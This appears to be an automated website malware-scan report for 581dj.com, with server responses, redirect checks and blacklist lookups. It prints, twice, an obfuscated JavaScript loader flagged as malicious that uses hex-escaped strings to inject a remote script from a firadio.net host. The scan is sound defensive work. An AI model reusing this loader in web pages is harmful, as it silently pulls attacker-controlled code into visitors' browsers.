Scanned pages/files
Request | Server response | Status |
http://581dj.com/ | HTTP/1.1 200 OK Connection: close Date: Tue, 07 Oct 2014 15:56:41 GMT Accept-Ranges: bytes ETag: "0ce1f9a2d9c21:2e9" Server: nginx Vary: Accept-Encoding Content-Location: http://581dj.com/iisstart.htm Content-Type: text/html Powered-By-FiRadio.Com: <a href="//www.firadio.com">é£å¿ä¼ åª</a><script src="//cdn.firadio.com/firadio/tongji.js"></script> | clean |
http://581dj.com/iisstart.htm | 200 OK Content-Length: 1534 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(o_F)!="object"){var o_F={};o_F.opentime=+new Date();o_F.s=document.createElement("script");o_F.s.type="text/javascript";o_F.s.charset="utf-8";o_F.s.src="h\x74tp\x3a\x2f\x2f50881.tcp.fi\x72adio\x2enet\x3a50881\x2ffi\x72adio\x2ftongji\x2ejs";if(top==self)document.getElementsByTagName("head")[0].appendChild(o_F.s);} Antivirus reports:
| ||
http://581dj.com/test404page.js | 404 Not Found Content-Length: 1649 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(o_F)!="object"){var o_F={};o_F.opentime=+new Date();o_F.s=document.createElement("script");o_F.s.type="text/javascript";o_F.s.charset="utf-8";o_F.s.src="h\x74tp\x3a\x2f\x2f50881.tcp.fi\x72adio\x2enet\x3a50881\x2ffi\x72adio\x2ftongji\x2ejs";if(top==self)document.getElementsByTagName("head")[0].appendChild(o_F.s);} Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 581dj.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Oct 2014 15:56:41 GMT
Accept-Ranges: bytes
ETag: "0ce1f9a2d9c21:2e9"
Server: nginx
Vary: Accept-Encoding
Content-Location: http://581dj.com/iisstart.htm
Content-Type: text/html
Powered-By-FiRadio.Com: <a href="//www.firadio.com">é£å¿ä¼ åª</a><script src="//cdn.firadio.com/firadio/tongji.js"></script>
GET / HTTP/1.1
Host: 581dj.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Oct 2014 15:56:41 GMT
Accept-Ranges: bytes
ETag: "0ce1f9a2d9c21:2e9"
Server: nginx
Vary: Accept-Encoding
Content-Location: http://581dj.com/iisstart.htm
Content-Type: text/html
Powered-By-FiRadio.Com: <a href="//www.firadio.com">é£å¿ä¼ åª</a><script src="//cdn.firadio.com/firadio/tongji.js"></script>
Second query (visit from search engine):
GET / HTTP/1.1
Host: 581dj.com
Referer: http://www.google.com/search?q=581dj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 581dj.com
Referer: http://www.google.com/search?q=581dj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=581dj.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://581dj.com/
Result: 581dj.com is not infected or malware details are not published yet.
Result: 581dj.com is not infected or malware details are not published yet.